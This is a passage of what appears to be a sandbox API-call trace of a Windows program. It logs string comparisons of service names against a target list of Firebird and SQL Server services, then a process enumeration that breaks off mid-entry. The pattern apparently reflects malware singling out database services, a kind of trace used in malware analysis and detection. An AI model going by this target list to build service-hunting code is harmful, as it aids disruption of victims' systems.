(lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0176.973] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0176.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0176.973] lstrlenW (lpString="iphlpsvc") returned 8 [0176.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0176.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0176.973] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0176.973] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0176.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0176.974] lstrlenW (lpString="KeyIso") returned 6 [0176.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0176.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0176.974] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0176.974] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0176.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0176.974] lstrlenW (lpString="LanmanServer") returned 12 [0176.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0176.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0176.974] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0176.974] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0176.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0176.974] lstrlenW (lpString="LanmanWorkstation") returned 17 [0176.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0176.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0176.974] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0176.974] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0176.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0176.974] lstrlenW (lpString="lfsvc") returned 5 [0176.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0176.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0176.974] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0176.974] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0176.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0176.974] lstrlenW (lpString="lmhosts") returned 7 [0176.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0176.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0176.975] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0176.975] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0176.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0176.975] lstrlenW (lpString="LSM") returned 3 [0176.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0176.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0176.975] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0176.975] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0176.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0176.975] lstrlenW (lpString="MpsSvc") returned 6 [0176.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0176.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0176.975] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0176.975] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0176.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0176.975] lstrlenW (lpString="NcbService") returned 10 [0176.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0176.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0176.975] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0176.975] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0176.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0176.975] lstrlenW (lpString="netprofm") returned 8 [0176.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0176.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0176.975] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0176.975] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0176.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0176.975] lstrlenW (lpString="NgcSvc") returned 6 [0176.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0176.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0176.976] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0176.976] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0176.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0176.976] lstrlenW (lpString="NlaSvc") returned 6 [0176.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0176.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0176.976] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0176.976] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0176.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0176.976] lstrlenW (lpString="nsi") returned 3 [0176.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0176.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0176.976] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0176.976] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0176.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0176.976] lstrlenW (lpString="PcaSvc") returned 6 [0176.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0176.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0176.976] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0176.976] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0176.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0176.976] lstrlenW (lpString="PlugPlay") returned 8 [0176.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0176.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0176.976] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0176.977] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0176.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0176.977] lstrlenW (lpString="Power") returned 5 [0176.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0176.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0176.977] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0176.977] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0176.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0176.977] lstrlenW (lpString="ProfSvc") returned 7 [0176.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0176.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0176.977] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0176.977] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0176.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0176.977] lstrlenW (lpString="RpcEptMapper") returned 12 [0176.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0176.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0176.977] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0176.977] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0176.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0176.977] lstrlenW (lpString="RpcSs") returned 5 [0176.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0176.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0176.977] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0176.977] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0176.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0176.977] lstrlenW (lpString="SamSs") returned 5 [0176.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0176.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0176.978] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0176.978] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0176.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0176.978] lstrlenW (lpString="Schedule") returned 8 [0176.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0176.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0176.978] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0176.978] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0176.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0176.978] lstrlenW (lpString="SecurityHealthService") returned 21 [0176.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0176.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0176.978] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0176.978] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0176.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0176.978] lstrlenW (lpString="SENS") returned 4 [0176.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0176.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0176.978] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0176.978] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0176.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0176.978] lstrlenW (lpString="ShellHWDetection") returned 16 [0176.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0176.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0176.978] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0176.978] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0176.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0176.979] lstrlenW (lpString="Spooler") returned 7 [0176.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0176.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0176.979] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0176.979] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0176.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0176.979] lstrlenW (lpString="StateRepository") returned 15 [0176.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0176.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0176.979] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0176.979] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0176.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0176.979] lstrlenW (lpString="SysMain") returned 7 [0176.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0176.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0176.979] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0176.979] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0176.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0176.979] lstrlenW (lpString="SystemEventsBroker") returned 18 [0176.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0176.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0176.979] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0176.979] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0176.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0176.979] lstrlenW (lpString="Themes") returned 6 [0176.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0176.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0176.979] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0176.979] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0176.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0176.980] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0176.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0176.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0176.980] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0176.980] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0176.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4601700 | out: hHeap=0x6a0000) returned 1 [0176.980] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x54c [0176.984] Process32FirstW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.985] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0176.986] lstrlenW (lpString="System") returned 6 [0176.986] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0176.989] lstrlenW (lpString="smss.exe") returned 8 [0176.990] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.990] lstrlenW (lpString="csrss.exe") returned 9 [0176.990] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0176.991] lstrlenW (lpString="wininit.exe") returned 11 [0176.991] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.992] lstrlenW (lpString="csrss.exe") returned 9 [0176.992] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0176.993] lstrlenW (lpString="winlogon.exe") returned 12 [0176.993] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0176.994] lstrlenW (lpString="services.exe") returned 12 [0176.994] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0176.995] lstrlenW (lpString="lsass.exe") returned 9 [0176.995] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0176.996] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0176.996] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0176.997] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0176.997] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.998] lstrlenW (lpString="svchost.exe") returned 11 [0176.998] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.999] lstrlenW (lpString="svchost.exe") returned 11 [0176.999] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.000] lstrlenW (lpString="dwm.exe") returned 7 [0177.000] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.000] lstrlenW (lpString="svchost.exe") returned 11 [0177.000] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.001] lstrlenW (lpString="svchost.exe") returned 11 [0177.001] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.002] lstrlenW (lpString="svchost.exe") returned 11 [0177.003] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.003] lstrlenW (lpString="svchost.exe") returned 11 [0177.003] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.011] lstrlenW (lpString="svchost.exe") returned 11 [0177.011] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.012] lstrlenW (lpString="svchost.exe") returned 11 [0177.012] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.013] lstrlenW (lpString="svchost.exe") returned 11 [0177.013] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.013] lstrlenW (lpString="svchost.exe") returned 11 [0177.013] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.014] lstrlenW (lpString="svchost.exe") returned 11 [0177.014] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.015] lstrlenW (lpString="svchost.exe") returned 11 [0177.015] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.024] lstrlenW (lpString="spoolsv.exe") returned 11 [0177.024] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.025] lstrlenW (lpString="svchost.exe") returned 11 [0177.025] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.026] lstrlenW (lpString="audiodg.exe") returned 11 [0177.026] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0177.026] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0177.027] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0177.027] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0177.027] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0177.028] lstrlenW (lpString="Memory Compression") returned 18 [0177.028] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0177.029] lstrlenW (lpString="sihost.exe") returned 10 [0177.029] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.030] lstrlenW (lpString="svchost.exe") returned 11 [0177.030] Process32NextW (in: hSnapshot=0x54c, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, 